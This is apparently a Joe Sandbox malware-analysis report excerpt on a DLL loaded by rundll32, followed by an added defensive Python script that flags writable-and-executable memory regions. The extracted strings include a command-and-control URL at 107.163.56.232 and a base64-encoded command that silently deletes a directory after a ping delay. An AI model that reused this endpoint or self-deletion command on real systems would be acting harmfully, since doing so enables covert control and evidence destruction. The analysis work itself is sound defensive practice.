• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep
• String ID: 107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$P
• API String ID: 3472027048-2873435839
• Opcode ID: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
• Instruction ID: 06cf6e753789beb41ee34e7b66c8b6e5b7de97640241e5e5236da3cdb21958a2
• Opcode Fuzzy Hash: 28d9bd6881a47177b600a1b2b79ae0656f869879b20bf0f0592bdd982a13f97b
• Instruction Fuzzy Hash: 2831867790425D6EEB11D7B4DC41BDA7B7CFF18350F5404E6E248E6182EB719B988B10
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Strings
• SeDebugPrivilege, xrefs: 10034413
• Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
Memory Dump Source
• Source File: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
• API String ID: 1749205058-3347928522
• Opcode ID: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
• Instruction ID: eef6782f7c8bf8d562aff317d79cc2e303554eab770f54d6d404826304d9c596
• Opcode Fuzzy Hash: fb7bd00363eee39283619e1ed9a14e5cb504e9f8b94119214717727e2e393674
• Instruction Fuzzy Hash: C611E3B4004245BFE702DF10DC81AAE7BA8FF44384F40886DF6856A241CBB1AAD48B56
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: InitVariant
                                                                                                                                                                          • String ID: $p=Vu
                                                                                                                                                                          • API String ID: 1927566239-153977967
                                                                                                                                                                          • Opcode ID: f7e4c4ce027b2b7a2f29caa61c96a0e7df8c1eedcad4405003d228f830d2cb21
                                                                                                                                                                          • Instruction ID: eb1a3d92cece7d0a5f388039fb4e2ce0f3b3243cd5656f56a25f0c556dfa24ec
                                                                                                                                                                          • Opcode Fuzzy Hash: f7e4c4ce027b2b7a2f29caa61c96a0e7df8c1eedcad4405003d228f830d2cb21
                                                                                                                                                                          • Instruction Fuzzy Hash: A7418375D0025A9BEF04DFA4C984AEEB7F8FF04284F10456EE90AA3245DB38AE04C761
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
                                                                                                                                                                          • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CC8
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          • Associated: 00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                                                          • String ID: %s\lang.ini$http://
                                                                                                                                                                          • API String ID: 1721638100-679094439
                                                                                                                                                                          • Opcode ID: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction ID: 57a004b8a41de6ea14946d18f863adaefc4c4a039aa1cd5e98ec9af79828a04e
                                                                                                                                                                          • Opcode Fuzzy Hash: 8aec026792d7cc627ceaacea1753a4a0de1203c886fd673e3097a2cb49c9cb00
                                                                                                                                                                          • Instruction Fuzzy Hash: FF11047690411C7EFB21DAA4CC42FDB7B6CDB04398F0045B1FB44B6081EA71AF844660
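The dump identifiers listed under Memory Dump Source carry more than a file name: the fifth dot-separated field of every entry above is a value from the Win32 PAGE_* protection set (00000002, 00000004, 00000020, 00000040, 00000080) and the seventh is 01000000, which equals MEM_IMAGE, while the first field (00000013, i.e. 19) and the second (2) match the `hcaresult_19_2_10000000_rundll32.jbxd` snapshot name. Read that way, the image mapped at 10000000 in the rundll32 process has seven regions from 1003F000 upward that are both writable and executable (PAGE_EXECUTE_READWRITE or PAGE_EXECUTE_WRITECOPY), which is what an in-place unpacker leaves behind and the first place to look when a report flags an entry point outside the standard sections. The Python below is an added example, not part of the Joe Sandbox report or of its tooling; the field layout it decodes is an inference from the values on this page, not documented by the report, and is labelled as an assumption in the code. The sample names are copied from the Memory Dump Source list of the second record above.

```python
"""Decode Joe Sandbox *.sdmp dump identifiers and flag writable+executable image regions.

Added example, not part of the Joe Sandbox report. ASSUMPTION: the dot-separated
fields are <pid>.<stage>.<dump id>.<base>.<PAGE_* protect>.<?>.<MEM_* type>.<?>;
this is inferred from the values on the page (protect values are valid PAGE_*
constants, field 7 == MEM_IMAGE, pid 0x13 == 19 matches the snapshot file name).
Fields 6 and 8 are not interpreted because the report does not establish them.
"""
from dataclasses import dataclass
from typing import Iterable, List, Tuple

# Win32 constants from winnt.h (these values are certain).
PAGE_NOACCESS, PAGE_READONLY, PAGE_READWRITE, PAGE_WRITECOPY = 0x01, 0x02, 0x04, 0x08
PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PAGE_GUARD = 0x100
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000

PROTECT_NAMES = {
    PAGE_NOACCESS: "PAGE_NOACCESS", PAGE_READONLY: "PAGE_READONLY",
    PAGE_READWRITE: "PAGE_READWRITE", PAGE_WRITECOPY: "PAGE_WRITECOPY",
    PAGE_EXECUTE: "PAGE_EXECUTE", PAGE_EXECUTE_READ: "PAGE_EXECUTE_READ",
    PAGE_EXECUTE_READWRITE: "PAGE_EXECUTE_READWRITE",
    PAGE_EXECUTE_WRITECOPY: "PAGE_EXECUTE_WRITECOPY",
}
EXEC_MASK = PAGE_EXECUTE | PAGE_EXECUTE_READ | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY
WRITE_MASK = PAGE_READWRITE | PAGE_WRITECOPY | PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY


@dataclass(frozen=True)
class DumpRegion:
    pid: int        # field 1, hex: 0x13 == 19, the "19" in hcaresult_19_2_... (assumed)
    stage: int      # field 2, hex: the "2" in the snapshot name (assumed)
    dump_id: str    # field 3, kept raw; looks like a counter, radix not established
    base: int       # field 4, hex region base address
    protect: int    # field 5, PAGE_* value, may carry modifiers such as PAGE_GUARD (assumed)
    mem_type: int   # field 7, MEM_* value (assumed)

    @property
    def protect_name(self) -> str:
        base_protect = self.protect & 0xFF          # drop PAGE_GUARD / PAGE_NOCACHE bits
        return PROTECT_NAMES.get(base_protect, f"0x{self.protect:x}")

    @property
    def writable_and_executable(self) -> bool:
        return bool(self.protect & EXEC_MASK) and bool(self.protect & WRITE_MASK)


def parse_sdmp_name(name: str) -> DumpRegion:
    """Parse one identifier such as
    00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp
    Raises ValueError for anything that does not have eight hex fields."""
    stem = name.strip()
    if stem.endswith(".sdmp"):
        stem = stem[:-len(".sdmp")]
    fields = stem.split(".")
    if len(fields) != 8:
        raise ValueError(f"expected 8 dot-separated fields, got {len(fields)}: {name!r}")
    try:
        pid, stage, base, protect, mem_type = (int(fields[i], 16) for i in (0, 1, 3, 4, 6))
    except ValueError as exc:
        raise ValueError(f"non-hex field in {name!r}") from exc
    return DumpRegion(pid=pid, stage=stage, dump_id=fields[2],
                      base=base, protect=protect, mem_type=mem_type)


def writable_executable_regions(names: Iterable[str]) -> List[Tuple[int, str]]:
    """Return (base, protection name), sorted by base, for every region that is
    both writable and executable. In a mapped image these are unpacking or
    self-modifying-code candidates and the first places to inspect."""
    hits = []
    for name in names:
        region = parse_sdmp_name(name)
        if region.writable_and_executable:
            hits.append((region.base, region.protect_name))
    return sorted(hits)


# Copied from the Memory Dump Source list of the record above (source file first).
REPORT_DUMP_NAMES = [
    "00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1872728593.0000000010000000.00000002.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1873172888.000000001000E000.00000002.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1873248836.0000000010012000.00000004.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1873289780.000000001001B000.00000020.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1873448755.000000001003F000.00000080.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1873956664.0000000010061000.00000040.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1874182111.0000000010062000.00000080.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1874234380.000000001006A000.00000040.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1874291746.000000001006B000.00000080.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1874363574.000000001006C000.00000040.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1874753866.000000001006D000.00000080.00000001.01000000.00000003.sdmp",
    "00000013.00000002.1874794536.000000001006E000.00000002.00000001.01000000.00000003.sdmp",
]

if __name__ == "__main__":
    for base, prot in writable_executable_regions(REPORT_DUMP_NAMES):
        print(f"{base:#010x}  {prot}")
```

Run against the list above, the script reports the seven regions from 1003F000 through 1006D000 as writable and executable while the code section at 10001000 stays PAGE_EXECUTE_READ; the per-region protect value is the thing to check before trusting any disassembly taken from a dump, since an RWX region may have been rewritten after the snapshot was taken.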